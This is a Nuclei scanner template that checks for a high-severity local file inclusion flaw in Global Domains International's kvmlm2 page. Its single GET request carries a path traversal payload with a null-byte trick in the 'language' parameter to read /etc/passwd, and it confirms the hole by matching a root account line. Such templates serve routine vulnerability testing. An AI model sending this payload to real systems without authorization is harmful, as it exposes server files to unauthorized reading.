id: global-domains-lfi

info:
  name: Global Domains International - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Global Domains International is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2018020247
    - http://www.nic.ws
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: globaldomains,lfi,traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a00463044022056c768829326bce36f9c7b6c75816c9beebf84fc79a93be3430483184cd884c80220634c8348f9f34250c9c2c844648f3ef63d0a5ac8f59f7377f60ddb77d92bf36c:922c64590222798bb761d5b6d8e72950